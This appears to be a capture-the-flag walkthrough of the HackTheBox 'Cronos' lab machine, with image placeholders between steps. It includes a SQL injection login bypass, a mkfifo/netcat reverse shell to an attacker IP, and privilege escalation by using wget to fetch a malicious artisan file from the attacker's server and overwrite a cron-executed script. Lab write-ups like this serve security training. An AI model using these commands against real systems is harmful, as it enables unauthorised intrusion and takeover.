nmap -A -p- -oA output 10.129.93.50 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -T4 -oA output 10.129.93.50 --script=vuln -v

nmap -sT -sV -sC -Pn -p- 10.129.93.50

Pasted image 20210304215143.png

10.129.93.50 server 10.129.93.50 cronos.htb

Pasted image 20210304215200.png

dig axfr @10.129.93.50 cronos.htb

Pasted image 20210304215221.png

echo "10.129.93.50 www.cronos.htb ns1.cronos.htb admin.cronos.htb cronos.htb" | sudo tee -a /etc/hosts

Pasted image 20210304215235.png

http://cronos.htb/

Pasted image 20210304215253.png

I tried a handful of SQL injection payloads. While ' or '1'='1 doesn’t work, ' or 1=1-- - does. That means it’s likely querying the database with

Pasted image 20210304215312.png

Pasted image 20210304215319.png

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.175 4444>/tmp/f
rlwrap nc -lvnp 4444

Pasted image 20210304215335.png

python -c "import pty; pty.spawn('/bin/bash')"
Do ctrl Z then write stty raw -echo && fg

Pasted image 20210304215403.png

python3 -m http.server 8888

Pasted image 20210304215418.png

www-data@cronos:/dev/shm$ bash LinEnum.sh

Pasted image 20210304215432.png

Found command running The command is php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Pasted image 20210304215639.png

Pasted image 20210304215644.png

define('DB_USERNAME', 'admin'); define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');

Pasted image 20210304215703.png

www-data@cronos:/var/www/laravel$ wget http://10.10.14.175:8888/artisan.php www-data@cronos:/var/www/laravel$ mv artisan.php artisan www-data@cronos:/var/www/laravel$ chmod a+x artisan

nc -lvnp 1234

Pasted image 20210304215720.png

boxes

copyright©2022 Cu3rv0x all rights reserved